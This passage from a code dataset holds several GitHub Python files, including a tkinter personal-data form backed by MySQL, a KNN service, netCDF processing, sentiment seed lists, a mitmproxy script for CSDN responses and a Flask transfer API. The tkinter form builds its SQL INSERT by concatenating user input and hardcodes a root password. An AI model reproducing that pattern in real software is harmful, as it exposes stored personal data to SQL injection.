e2npy(config)\n","repo_name":"zyfff/Canny-EVT","sub_path":"scripts/e2npy.py","file_name":"e2npy.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"517713000","text":"import tkinter\nimport tkinter.messagebox\nfrom PIL import ImageTk,Image\n\nt=tkinter.Tk()\n\n\n\n\n\nt.title('DATA BASE')\n\nt.geometry('1000x600')\n\nz=Image.open(\"D:\\\\Relin.m\\\\PY PROJECTS\\\\project\\\\relin.png\")\nz=z.resize((1000,600))\nz=ImageTk.PhotoImage(z)\n\npic=tkinter.Label(t,image=z)\npic.place(x=0,y=0)\n\na=tkinter.Label(text=\"PERSONAL DATA BASE\",bg=\"White\",fg=\"Black\",font=(\"Lucida Bright\",36,'bold'))\na.place(x=190,y=10)\n\n\n\nb=tkinter.Label(text=\" 1) First Name -\",bg=\"white\",fg=\"Black\",font=(\"Calibri\",15,))\nb.place(x=0,y=100)\n\nc=tkinter.Entry(width=30)\nc.place(x=180,y=110)\n\n\nd=tkinter.Label(text=\" 2) Last Name -\",bg=\"white\",fg=\"Black\",font=(\"Calibri\",15,))\nd.place(x=0,y=150)\n\ne=tkinter.Entry(width=30)\ne.place(x=180,y=160)\n\nf=tkinter.Label(text=\" 3) Age -\",bg=\"white\",fg=\"Black\",font=(\"Calibri\",15,))\nf.place(x=0,y=200)\n\ng=tkinter.Entry(width=30)\ng.place(x=180,y=210)\n\nh=tkinter.Label(text=\" 4) Email ID -\",bg=\"white\",fg=\"Black\",font=(\"Calibri\",15,))\nh.place(x=0,y=250)\n\ni=tkinter.Entry(width=30)\ni.place(x=180,y=260)\n\nj=tkinter.Label(text=\" 5) Phone Number -\",bg=\"white\",fg=\"Black\",font=(\"Calibri\",15,))\nj.place(x=0,y=300)\n\nk=tkinter.Entry(width=30)\nk.place(x=180,y=310)\n\nl=tkinter.Label(text=\" 6) Gender -\",bg=\"white\",fg=\"black\",font=(\"Calibri\",15,))\nl.place(x=0,y=350)\n\nm=tkinter.Entry(width=30)\nm.place(x=180,y=360)\n\nn=tkinter.Label(text=\" 7) Location -\",bg=\"white\",fg=\"black\",font=(\"Calibri\",15,))\nn.place(x=0,y=400)\n\no=tkinter.Entry(width=30)\no.place(x=180,y=410)\n\n\ndef fun():\n firstname=c.get()\n lastname=e.get()\n age=g.get()\n emailid=i.get()\n phonenumber=k.get()\n gender=m.get()\n location=o.get()\n\n if(firstname==\"\"or lastname==\"\" or age==\"\" or emailid==\"\" or phonenumber==\"\" or gender==\"\" or location==\"\"):\n tkinter.messagebox.showerror(\"Error Message\",\"Please Complete Fields\")\n\n else:\n import pymysql\n \n x=pymysql.connect(host =\"localhost\", user = \"root\", password = \"relin\", db = \"project\" )\n cur=x.cursor()\n cur.execute(\"insert into data 
values('\"+firstname+\"','\"+lastname+\"','\"+age+\"','\"+emailid+\"','\"+phonenumber+\"','\"+gender+\"','\"+location+\"')\")\n x.commit()\n x.close()\n \n tkinter.messagebox.askyesno(\"Save\",\"Do You Want to Save\")\n tkinter.messagebox.showinfo(\"Thank You\",\"Thanks For Visiting\")\n t.destroy()\n \np=tkinter.Button(text=\"Submit\",fg=\"black\",font=(\"Calibri\",15),command=fun)\np.place(x=500,y=500)\n\n\n\n\n\n\n\n\nt.mainloop()\n","repo_name":"relinmathew/Personal-Database","sub_path":"DATABASES.py","file_name":"DATABASES.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15470503018","text":"from services import CalculateGaussianScoreService\n\n\nclass CalculateWeightedKNNService:\n\n def __init__(self, data, vec1, k=5, score_func=CalculateGaussianScoreService):\n self.data = data\n self.vec1 = vec1\n self.k = k\n self.score_func = score_func\n\n\n def call(self):\n # Get distances\n dlist = self._get_distances()\n\n avg = 0.0\n total_weight = 0.0\n\n # Get weighted average\n for i in range(self.k):\n dist = dlist[i][0]\n idx = dlist[i][1]\n\n weight = self.score_func(dist).call()\n avg += weight * self.data[idx]['result']\n total_weight += weight\n\n if total_weight == 0:\n return 0\n avg /= total_weight\n return avg\n\n def _get_distances(self):\n distance_list = []\n\n # Loop over every item in the dataset\n for i in range(len(self.data)):\n vec2 = self.data[i]['input']\n\n # Add the distance and the index\n distance_list.append((self.score_func(self.vec1, vec2).call(), i))\n\n # Sort by distance\n distance_list.sort()\n return distance_list\n","repo_name":"andreffs18/collective-intelligence","sub_path":"chapter8/services/calculate_weighted_knn_service.py","file_name":"calculate_weighted_knn_service.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"31531034874","text":"# Author: Hanzi Mao \n#\n# License: BSD 3 clause\n\nfrom ..utils import select_area, get_lat_lon, match_lat_lon, get_out_path\n\nimport os\nimport numpy.ma as ma\nimport numpy as np\nfrom netCDF4 import Dataset\n\n\ndef merge_sentinel_smap_p_e(doy, lat1, lat2, lon1, lon2, area_name, verbose=True):\n # merge to check the match between sentinel and smap_e\n fh_dic = dict()\n fh_dic[\"sentinel\"] = Dataset(os.path.join(\"Data\", \"Sentinel\", \"usa\", doy + \".nc\"), \"r\")\n fh_dic[\"smap_p_e\"] = Dataset(os.path.join(\"Data\", \"SMAP_P_E\", \"usa_3km_match_sentinel\", doy + \".nc\"), \"r\")\n\n out_path = get_out_path(os.path.join(\"Data\", \"Merge_Sentinel_SMAP_Passive\", area_name))\n fh_out = Dataset(os.path.join(out_path, doy + \".nc\"), \"w\")\n\n lat_indices, lon_indices = select_area(lat1, lat2, lon1, lon2, \"M03\")\n lats, lons = get_lat_lon(\"M03\")\n assert (len(lats) != 0 and len(lons) != 0)\n lats = lats[lat_indices[0]: lat_indices[1]]\n lons = lons[lon_indices[0]: lon_indices[1]]\n\n i_lat_start, i_lat_end, i_lon_start, i_lon_end = match_lat_lon(fh_dic[\"sentinel\"].variables[\"lat\"][:],\n fh_dic[\"sentinel\"].variables[\"lon\"][:],\n lats,\n lons)\n\n fh_out.createDimension('lat', len(lats))\n fh_out.createDimension('lon', len(lons))\n\n outVar = fh_out.createVariable('lat', 'f4', ('lat'))\n outVar.setncatts({\"units\": \"degree_north\"})\n outVar[:] = lats[:]\n outVar = fh_out.createVariable('lon', 'f4', ('lon'))\n outVar.setncatts({\"units\": \"degree_east\"})\n outVar[:] = lons[:]\n\n 
rename_dic = {\"soil_moisture\": \"smap_p_e_soil_moisture\",\n \"tb_v_corrected\": \"smap_p_e_tb_v_corrected\"}\n ma_dic = {}\n for fName in fh_dic:\n for v_name, varin in fh_dic[fName].variables.items():\n if v_name in [\"soil_moisture\", \"tb_v_corrected\", \"tb_v_disaggregated\"]:\n if fName == \"smap_p_e\":\n v_name = rename_dic[v_name]\n outVar = fh_out.createVariable(v_name, varin.datatype, varin.dimensions)\n outVar.setncatts({k: varin.getncattr(k) for k in varin.ncattrs()})\n outVar[:] = varin[i_lat_start: i_lat_end + 1, i_lon_start: i_lon_end + 1]\n ma_dic[v_name] = ma.getmaskarray(varin[i_lat_start: i_lat_end + 1, i_lon_start: i_lon_end + 1])\n\n daily_mask = np.logical_or.reduce(list(ma_dic.values()))\n if verbose:\n print(\"Before mask, number of valid grids:\", fh_out.variables[\"soil_moisture\"][:].count())\n for var in fh_out.variables:\n if var != \"lat\" and var != \"lon\":\n if ma.is_masked(fh_out.variables[var][:]):\n print(var, ma.array(fh_out.variables[\"soil_moisture\"][:], mask=\n ma.mask_or(ma.getmaskarray(fh_out.variables[\"soil_moisture\"][:]),\n ma.getmaskarray(fh_out.variables[var][:]))).count())\n for var in fh_out.variables:\n if var != \"lat\" and var != \"lon\":\n fh_out.variables[var][:] = ma.array(fh_out.variables[var][:], mask=daily_mask)\n if verbose:\n print(\"After mask, number of valid grids:\", fh_out.variables[\"soil_moisture\"][:].count())","repo_name":"HannaMao/Gap-Filling-of-Soil-Moisture","sub_path":"data_preprocessing/merge/merge_sentinel_smap_p_e.py","file_name":"merge_sentinel_smap_p_e.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"23366255579","text":"import random\n\n\"\"\"\nSeed words for propagating polarity scores.\n\"\"\"\n\n# From Turney and Littman (2003), probably not ideal for historical data\nPOSITIVE_TURNEY = [\n \"good\",\n \"nice\",\n \"excellent\",\n \"positive\",\n \"fortunate\",\n \"correct\",\n \"superior\",\n]\nNEGATIVE_TURNEY = [\n \"bad\",\n \"terrible\",\n \"poor\",\n \"negative\",\n \"unfortunate\",\n \"wrong\",\n \"inferior\",\n]\n\nPOSITIVE_FINANCE = [\n \"successful\",\n \"excellent\",\n \"profit\",\n \"beneficial\",\n \"improving\",\n \"improved\",\n \"success\",\n \"gains\",\n \"positive\",\n]\nNEGATIVE_FINANCE = [\n \"negligent\",\n \"loss\",\n \"volatile\",\n \"wrong\",\n \"losses\",\n \"damages\",\n \"bad\",\n \"litigation\",\n \"failure\",\n \"down\",\n \"negative\",\n]\n\n# POSITIVE_TWEET = [\"love\", \"awesome\", \"nice\", \"amazing\", \"best\", \"fantastic\", \"correct\"]\n# NEGATIVE_TWEET = [\"hate\", \"terrible\", \"nasty\", \"awful\", \"worst\", \"horrible\", \"wrong\"]\n\nPOSITIVE_TWEET = [\n \"love\",\n \"loved\",\n \"loves\",\n \"awesome\",\n \"nice\",\n \"amazing\",\n \"best\",\n \"fantastic\",\n \"correct\",\n \"happy\",\n]\nNEGATIVE_TWEET = [\n \"hate\",\n \"hated\",\n \"hates\",\n \"terrible\",\n \"nasty\",\n \"awful\",\n \"worst\",\n \"horrible\",\n \"wrong\",\n \"sad\",\n]\n\nMALE = [\n \"man\",\n \"male\",\n \"boy\",\n \"gentleman\",\n \"mr\",\n \"masculine\",\n \"dad\",\n \"father\",\n \"brother\",\n \"son\",\n \"guy\",\n]\n\nFEMALE = [\n \"female\",\n \"woman\",\n \"girl\",\n \"lady\",\n \"chick\",\n \"mom\",\n \"sister\",\n \"mother\",\n \"feminine\",\n \"daughter\",\n \"ms\",\n \"mrs\",\n \"miss\"\n]\n\nPOSITIVE_HIST = [\n \"good\",\n \"lovely\",\n \"excellent\",\n \"fortunate\",\n \"pleasant\",\n \"delightful\",\n \"perfect\",\n \"loved\",\n \"love\",\n \"happy\",\n \"freedom\", 
\"glorious\", \"glory\", \"perfect\", \"perfectly\", \"paradise\", \"reign\", \"help\", \"recovered\", \"recover\", \"helped\", \"free\", \"freed\", \"liberate\", \"liberated\", \"save\", \"saved\", \"intervened\", \"support\", \"resolve\", \"resolved\", \"geurrilla\", \"leader\", \"safe\", \"safety\",\n]\nNEGATIVE_HIST = [\n \"bad\",\n \"horrible\",\n \"poor\", \"unfortunate\",\n \"unpleasant\",\n \"disgusting\",\n \"evil\",\n \"hated\",\n \"hate\",\n \"unhappy\",\n \"enslaved\", \"murder\", \"murdered\", \"terror\", \"terrorist\", \"terrorism\", \"murderer\", \"brutal\", \"brutalizing\", \"dictator\", \"massacre\", \"oppressed\", \"loot\", \"looted\", \"pillage\", \"pillaged\", \"regime\", \"genocide\", \"horror\", \"horrors\", \"oppressor\", \"oppressors\", \"occupy\", \"occupation\", \"cruel\",\n]\n\nPOSITIVE_ADJ = [\n \"good\",\n \"lovely\",\n \"excellent\",\n \"fortunate\",\n \"pleasant\",\n \"delightful\",\n \"perfect\",\n \"happy\",\n]\nNEGATIVE_ADJ = [\n \"bad\",\n \"horrible\",\n \"poor\",\n \"unfortunate\",\n \"unpleasant\",\n \"disgusting\",\n \"evil\",\n \"unhappy\",\n]\n\n\ndef twitter_seeds():\n return POSITIVE_TWEET, NEGATIVE_TWEET\n\n\ndef finance_seeds():\n return POSITIVE_FINANCE, NEGATIVE_FINANCE\n\n\ndef turney_seeds():\n return POSITIVE_TURNEY, NEGATIVE_TURNEY\n\n\ndef adj_seeds():\n return POSITIVE_ADJ, NEGATIVE_ADJ\n\n\ndef hist_seeds():\n return POSITIVE_HIST, NEGATIVE_HIST\n\ndef gender_seeds():\n return MALE, FEMALE\n\ndef random_seeds(words, lexicon, num):\n sample_set = list(set(words).intersection(lexicon))\n seeds = random.sample(sample_set, num)\n return [s for s in seeds if lexicon[s] == 1], [s for s in seeds if lexicon[s] == -1]\n","repo_name":"coraxolotl/MTH3401-src","sub_path":"SocialSent2/SocialSent2/socialsent/seeds.py","file_name":"seeds.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22110100902","text":"\"\"\"\n INTERVAL: MERGE WITH SORTED INTERVALS (EPI 14.5: MERGING INTERVALS)\n\n Write a function which takes an interval to be added and a list of disjoint closed intervals with integer endpoints\n (sorted by left endpoint), then computes and returns the union of the intervals in the list and the added interval\n sorted by left endpoint).\n\n Example:\n Input = ([1,8], [[-4, -1], [0, 2], [3, 6], [7, 9], [11, 12], [14, 17]])\n Output = [[-4, -1], [0, 9], [11, 12], [14, 17]]\n\n REMEMBER: '(', ')' is open (up to, not including), '[', ']' is closed (up to, including).\n\"\"\"\n\n\n# Questions you should ask the interviewer (if not explicitly stated):\n# - What time/space complexity are you looking for?\n# - What are the possible list lengths (empty)?\n# - Will each interval be correctly formatted (have a start and and end, start < end)?\n# - Are the interval endpoints open or closed?\n\n\n# APPROACH: Brute Force (NOT IMPLEMENTED)\n#\n# Form a set with all the list intervals and the new interval. 
Find the smallest start and the largest end point from\n# the set, then create the result list from testing each integer in the range from the smallest to the largest for\n# membership in the set.\n#\n# Time Complexity: O(d * n), where d is the difference between the two extreme values, and n is the (new) set size.\n# Space Complexity: O(r), where r is the length of the result list.\n\n\n# Approach: Improved\n#\n# This approach improves on the brute force approach (above) and does not check ALL integers in the range of lowest to\n# highest interval, only the integers in the combined set of intervals endpoints.\n#\n# The process is:\n# (1) Add each interval that (starts and) ends BEFORE the added (new) interval to the result.\n# (2) Once at the interval that intersects with the added (new) interval, compute the union, iterating through\n# subsequent intervals (if they intersect with the added interval), and add (the union interval) to result.\n# (3) Iterate through remaining intervals, adding them to result.\n#\n# Time Complexity: O(n), where n is the length of the list.\n# Space Complexity: O(r), where r is the length of the result list.\ndef merge_with_sorted_intervals(new_interval, intervals_list):\n if intervals_list is not None and new_interval is not None:\n result = []\n i = 0\n while i < len(intervals_list) and intervals_list[i][1] < new_interval[0]:\n result.append(intervals_list[i])\n i += 1\n # Accumulate the union in merged_interval; starting from new_interval also covers the no-overlap case.\n merged_interval = new_interval\n while i < len(intervals_list) and intervals_list[i][0] <= merged_interval[1]:\n merged_interval = [min(merged_interval[0], intervals_list[i][0]), max(merged_interval[1], intervals_list[i][1])]\n i += 1\n result.append(merged_interval)\n result += intervals_list[i:]\n return result\n\n\nargs = [([1, 8], [[-4, -1], [0, 2], [3, 6], [7, 9], [11, 12], [14, 17]]),\n ([2, 6], [[1, 3], [8, 10], [15, 18]]),\n ([1, 4], [[4, 5]])]\nfns = [merge_with_sorted_intervals]\n\nfor new_interval, interval_list in args:\n print(f\"new_interval: {new_interval}\\ninterval_list: {interval_list}\")\n for fn in fns:\n print(f\"{fn.__name__}(new_interval, intervals_list): {fn(new_interval, interval_list)}\")\n print()\n\n\n","repo_name":"mpettersson/PythonReview","sub_path":"questions/sort_and_search/interval_merge_with_sorted_intervals.py","file_name":"interval_merge_with_sorted_intervals.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36258408601","text":"import os\nimport codecs\nimport subprocess\nimport platform\n\nfrom pseudo import compile, __version__\nfrom pseudo.cli import pdc\nfrom pseudo.type import Int, Statement, EOL\n\n\ndef test_compile():\n if compile(\"pisz 4\") != [Statement(\"pisz\", args=Int(4)), EOL()]:\n print(compile(\"pisz 4\"))\n raise AssertionError\n\n\nscript = \"\"\"\na := 1\njeżeli a=1 to\n T[a] := a\n pisz a\n\ndopóki a < 2 wykonuj\n T[a] := a\n a:=a+1\npisz \"2\"\n\ndla i:=3,...,5 wykonuj\n dla x:=3,...,5 wykonuj\n T[x] <- x\n pisz x\n\nkoniec\n\"\"\"\n\n\ndef test_main():\n with codecs.open(\"t1.pdc\", encoding=\"utf-8\", mode=\"w\") as fp:\n fp.write(script)\n cmd = \"python3 pdc.py t1.pdc\"\n if platform.system() == \"Windows\":\n cmd = cmd.replace(\"3\", \"\")\n if subprocess.getoutput(cmd) != \"12345345345\":\n print(cmd)\n print(subprocess.getoutput(cmd))\n raise AssertionError\n os.remove(\"t1.pdc\")\n\n cmd = \"python3 pdc.py -v\"\n if platform.system() == \"Windows\":\n cmd = cmd.replace(\"3\", \"\")\n if subprocess.getoutput(cmd) != __version__:\n
print(cmd)\n print(subprocess.getoutput(cmd))\n raise AssertionError\n\n cmd = [\"python3\", \"pdc.py\"]\n if platform.system() == \"Windows\":\n cmd[0] = cmd[0].replace(\"3\", \"\")\n if subprocess.run(cmd).returncode == 0:\n print(cmd)\n print(subprocess.run(cmd).returncode)\n raise AssertionError\n","repo_name":"pniedzwiedzinski/pseudo","sub_path":"tests/pseudo_test.py","file_name":"pseudo_test.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
+{"seq_id":"17087626105","text":"class Solution:\n def isAlienSorted(self, words: List[str], order: str) -> bool:\n n = len(words)\n d = {}\n for i, x in enumerate(order):\n d[x] = i\n \n for i in range(n-1):\n for j in range(len(words[i])):\n if j>=len(words[i+1]):\n return False\n \n if words[i][j] != words[i+1][j]:\n if d[words[i][j]] > d[words[i+1][j]]:\n return False\n break\n return True","repo_name":"mrprashantkumar/LeetCode-Submissions-Python","sub_path":"0953-verifying-an-alien-dictionary/0953-verifying-an-alien-dictionary.py","file_name":"0953-verifying-an-alien-dictionary.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"25146228577","text":"import csv\nimport json\n\ndef response(flow):\n # Print to check whether this response holds the content we need, or inspect the request's response to see what came back\n # Printing everything produces more output than can be read, making the target url impossible to pin down; press q to quit and inspect the request instead\n url = 'https://gw.csdn.net/cms-app/v1/blog_details/may_login/get_article_details_info_html?from=home&bloggerUserName=qq_43431158'\n if flow.request.url.startswith(url):\n text = flow.response.text\n print(text)\n","repo_name":"somebady111/mitmproxy_csdn","sub_path":"parse_csdn_article_detail.py","file_name":"parse_csdn_article_detail.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"22871954467","text":"import numpy as np\nimport os\nfrom plyfile import PlyData, PlyElement\nimport torch\n#from multiprocessing.dummy import Pool as ThreadPool \n\nimport transforms3d.euler as euler\nfrom os import mkdir\nfrom os.path import join, exists\n\n\n\nSCALE = 1\n\ndef get_ply_fn_lst(folder_lst):\n ply_fn_lst =[]\n for folder in folder_lst:\n name_lst = os.listdir(folder)\n for name in name_lst:\n if(\".ply\" in name):\n fn=folder + \"/\"+name\n ply_fn_lst+=[fn]\n return ply_fn_lst\n\n\n\n#pc p_num*3 np\ndef get_augmented_pc(pc):\n size= pc.shape[0]\n new_pc = pc\n \n axis = np.random.rand(3)\n axis = axis / np.sqrt(pow(axis,2).sum()) \n \n theta= (np.random.rand()-0.5)*np.pi*2\n \n Rorgmat = euler.axangle2mat(axis,theta)\n R = Rorgmat.reshape((1,3,3)).repeat(size,0) \n Torg = (np.random.rand(1,3,1)-0.5)*0.2 #-10cm to 10cm \n T=Torg.repeat(size,0)\n \n new_pc = np.matmul(R, new_pc.reshape((size,3,1))) +T\n \n return new_pc.reshape((size,3))\n\ndef get_augmented_pc_ret(pc):\n size= pc.shape[0]\n new_pc = pc\n\n axis = np.random.rand(3)\n axis = axis / np.sqrt(pow(axis,2).sum())\n \n theta= (np.random.rand()-0.5)*np.pi*2\n \n Rorgmat = euler.axangle2mat(axis,theta)\n R = Rorgmat.reshape((1,3,3)).repeat(size,0)\n Torg = (np.random.rand(1,3,1)-0.5)*0.2 #-10cm to 10cm\n T=Torg.repeat(size,0)\n \n new_pc = np.matmul(R, new_pc.reshape((size,3,1))) +T\n \n return new_pc.reshape((size,3)), Rorgmat, Torg[...,0]\n\n\n##return batch*p_num*3 torch\ndef get_random_pc_batch_from_ply_fn_lst_torch(ply_fn_lst , batch, augmented=False):\n \n ply_fn_batch = []\n \n for b in range(batch):\n index 
= np.random.randint(0, len(ply_fn_lst))\n ply_fn_batch+=[ply_fn_lst[index]]\n \n pc_batch=[]\n for ply_fn in ply_fn_batch:\n pc = get_pc_from_ply_fn(ply_fn)\n if(augmented==True):\n pc = get_augmented_pc(pc)\n pc_batch +=[pc]\n \n pc_batch_torch = torch.FloatTensor(pc_batch).cuda()\n \n return pc_batch_torch\n\n#num*p_num*3 numpy\ndef get_all_pcs_from_ply_fn_lst_np(ply_fn_lst):\n pc_lst=[]\n n=0\n for ply_fn in ply_fn_lst:\n pc = get_pc_from_ply_fn(ply_fn)\n pc_lst +=[pc]\n if(n%100==0):\n print (n)\n n=n+1\n print (\"load\", n, \"pcs\")\n \n return pc_lst\n\n\n##return batch*p_num*3 torch # batch*p_num*3 torch\ndef get_random_pc_batch_from_pc_lst_torch(pc_lst , neighbor_lst, neighbor_num_lst, batch, augmented=False):\n \n #pc_colors_batch = []\n weights_batch=[]\n pc_batch = []\n for b in range(batch):\n index = np.random.randint(0, len(pc_lst))\n pc_weights = pc_lst[index]\n pc = pc_weights[:,0:3]\n weights = pc_weights[:,3]\n #colors = pc_weights[:,3:6]\n\n if(augmented==True):\n pc=get_augmented_pc(pc)\n pc_batch +=[pc]\n #pc_colors = np.concatenate((pc, colors),1)\n #pc_colors_batch+=[pc_colors]\n weights_batch+=[weights]\n #pc_colors_batch = np.array(pc_colors_batch)\n weights_batch = np.array(weights_batch)\n #smoothed_pc_batch = get_smoothed_pc_batch_iter(pc_batch,neighbor_lst, neighbor_num_lst)\n \n weights_batch_torch = torch.FloatTensor(weights_batch).cuda()\n #pc_colors_batch_torch = torch.FloatTensor(pc_colors_batch).cuda()\n pc_batch_torch = torch.FloatTensor(pc_batch).cuda()\n\n #smoothed_pc_batch_torch = torch.FloatTensor(smoothed_pc_batch).cuda()\n return pc_batch_torch , weights_batch_torch #, smoothed_pc_batch_torch\n\n\n##return batch*p_num*3 torch # batch*p_num*3 torch\ndef get_indexed_pc_from_pc_lst_torch(pc_lst , index, augmented=False):\n \n pc_weights = pc_lst[index]\n pc = pc_weights[:,0:3]\n weights = pc_weights[:,3]\n \n if(augmented==True):\n pc=get_augmented_pc(pc)\n\n weights_torch = torch.from_numpy(weights).float()\n pc_torch = torch.from_numpy(pc).float()\n \n return pc_torch , weights_torch #, smoothed_pc_batch_torch\n\n#point_num*3\ndef compute_and_save_ply_mean(folder_lst, pc_fn):\n ply_fn_lst=get_ply_fn_lst(folder_lst)\n pc_batch = []\n for ply_fn in ply_fn_lst:\n pc = get_pc_from_ply_fn(ply_fn)\n pc_batch +=[pc]\n pc_batch = np.array(pc_batch)\n pc_mean = pc_batch.mean(0)\n pc_std = pc_batch.std(0)\n np.save(pc_fn+\"mean\", pc_mean)\n np.save(pc_fn+\"std\", pc_std)\n return pc_mean ,pc_std\n \n \n \n \n\n#pc p_num np*3\n#template_ply Plydata\ndef save_pc_into_ply(template_ply, pc, fn):\n plydata=template_ply\n #pc = pc.copy()*pc_std + pc_mean\n plydata['vertex']['x']=pc[:,0]\n plydata['vertex']['y']=pc[:,1]\n plydata['vertex']['z']=pc[:,2]\n plydata.write(fn)\n \n#pc p_num np*3\n#color p_num np*3 (0-255)\n#template_ply Plydata\ndef save_pc_with_color_into_ply(template_ply, pc, color, fn):\n plydata=template_ply\n #pc = pc.copy()*pc_std + pc_mean\n plydata['vertex']['x']=pc[:,0]\n plydata['vertex']['y']=pc[:,1]\n plydata['vertex']['z']=pc[:,2]\n \n plydata['vertex']['red']=color[:,0]\n plydata['vertex']['green']=color[:,1]\n plydata['vertex']['blue']=color[:,2]\n \n plydata.write(fn)\n plydata['vertex']['red']=plydata['vertex']['red']*0+0.7\n plydata['vertex']['green']=plydata['vertex']['red']*0+0.7\n plydata['vertex']['blue']=plydata['vertex']['red']*0+0.7\n \n \ndef get_smoothed_pc_batch_iter(pc, neighbor_lst,neighbor_num_lst, iteration=10):\n smoothed_pc = get_smoothed_pc_batch(pc,neighbor_lst,neighbor_num_lst)\n for i in range(iteration):\n 
smoothed_pc = get_smoothed_pc_batch(smoothed_pc,neighbor_lst,neighbor_num_lst)\n return smoothed_pc\n\n#pc batch*point_num*3\n#neibhor_lst point_num*max_neighbor_num\n#neibhor_num_lst point_num\ndef get_smoothed_pc_batch(pc, neighbor_lst, neighbor_num_lst):\n batch = pc.shape[0]\n point_num = pc.shape[1]\n pc_padded = np.concatenate((pc, np.zeros((batch, 1,3))),1) #batch*(point_num+1)*1\n smoothed_pc = pc.copy()\n for n in range(1,neighbor_lst.shape[1]):\n smoothed_pc += pc_padded[:,neighbor_lst[:,n]]\n \n smoothed_pc =smoothed_pc / neighbor_num_lst.reshape((1,point_num,1)).repeat(batch,0).repeat(3, 2)\n \n return smoothed_pc\n\ndef get_smoothed_pc_iter(pc, neighbor_lst,neighbor_num_lst, iteration=10):\n smoothed_pc = get_smoothed_pc(pc,neighbor_lst,neighbor_num_lst)\n for i in range(iteration):\n smoothed_pc = get_smoothed_pc(smoothed_pc,neighbor_lst,neighbor_num_lst)\n return smoothed_pc\n\n\n#pc point_num*3\n#neibhor_lst point_num*max_neighbor_num\n#neibhor_num_lst point_num\ndef get_smoothed_pc(pc, neighbor_lst, neighbor_num_lst):\n point_num =pc.shape[0]\n pc_padded = np.concatenate((pc, np.zeros((1,3))),0) #batch*(point_num+1)*1\n smoothed_pc = pc.copy()\n for n in range(1,neighbor_lst.shape[1]):\n smoothed_pc += pc_padded[neighbor_lst[:,n]]\n\n smoothed_pc =smoothed_pc / neighbor_num_lst.reshape(point_num,1).repeat(3,1)\n \n return smoothed_pc\n\n\ndef transform_plys_to_npy(ply_folder, npy_fn):\n pcs = []\n name_lst = os.listdir(ply_folder)\n n=0\n for name in name_lst:\n if(\".ply\" in name):\n if(n%100==0):\n print (n)\n fn = ply_folder+\"/\"+name\n pc = get_pc_from_ply_fn(fn)\n pcs+=[pc]\n n+=1\n \n pcs = np.array(pcs)\n \n np.save(npy_fn, pcs)\n \n \ndef get_pcs_from_ply_folder(ply_folder):\n pcs = []\n name_lst = os.listdir(ply_folder)\n n=0\n for name in name_lst:\n if(\".ply\" in name):\n if(n%100==0):\n print (n)\n fn = ply_folder+\"/\"+name\n pc = get_pc_from_ply_fn(fn)\n pcs+=[pc]\n n+=1\n \n pcs = np.array(pcs)\n \n return pcs\n\n","repo_name":"facebookresearch/VCMeshConv","sub_path":"GraphAutoEncoder/graphAE_dataloader.py","file_name":"graphAE_dataloader.py","file_ext":"py","file_size_in_byte":7749,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"37"} +{"seq_id":"4623059098","text":"def cons_box(box, w, h):\n \"\"\"Check and make sure the box is not exceeding the boundary.\n Args:\n box: Box (Left, Top, Right, Bottom) location list.\n w: The width of the image which the box lives on.\n h: The height of the image which the box lives on.\n Returns:\n The constrained box (Left, Top, Right, Bottom) location list.\n \"\"\"\n box[0] = max(0, box[0])\n box[1] = max(0, box[1])\n box[2] = min(w, box[2])\n box[3] = min(h, box[3])\n return box\n \ndef bounding_box_rec2square(img, box, scale=1):\n # In case the box is out of image\n box = cons_box(box, img.shape[1], img.shape[0])\n big_box = []\n \n # \n width = abs(box[0]-box[2])\n height = abs(box[1]-box[3])\n center = (int(box[0]+width/2), int(box[1]+height/2))\n square_len = int((width+height)/2)\n \n big_box.append(center[0] - scale*square_len//2)\n big_box.append(center[1] - scale*square_len//2)\n big_box.append(center[0] + scale*square_len//2)\n big_box.append(center[1] + scale*square_len//2)\n \n big_box = cons_box(big_box, img.shape[1], img.shape[0])\n return 
big_box\n\n","repo_name":"miracleyoo/mlib","sub_path":"cv/face/bounding_box.py","file_name":"bounding_box.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"30424672913","text":"from flask import Flask, request, jsonify\nfrom accounts_manager import *\n\napp = Flask(__name__)\n\nac = AccountManager()\n\n\n@app.route('/api/transfer/', methods=['GET', 'POST'])\ndef add_message():\n from_id = request.json['fromAccountId']\n to_id = request.json['toAccountId']\n amount = paisa_to_ruppes(request.json['amount'])\n\n if not check_transfer_validty(to_id, from_id):\n return jsonify(ERRORS_CODES[ERROR_FOR_SAME_ACCOUNT_ID])\n\n if request.json['account_type']:\n output = ac.transfer_amount(from_id, to_id, amount, request.json['account_type'])\n else:\n output = ac.transfer_amount(from_id, to_id, amount)\n\n return jsonify(output)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n return jsonify({\"app\": \"running on localhost\"})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","repo_name":"tarun-jethwani/BankingAPI","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24185096796","text":"import unittest\nfrom workload_analyzer.WorkloadAnalyzer import *\n\n\nclass TestWorkloadAnalyzer(unittest.TestCase):\n def test_GetTestMetadata(self):\n test_start_time, config_file = GetTestMetadata(\n 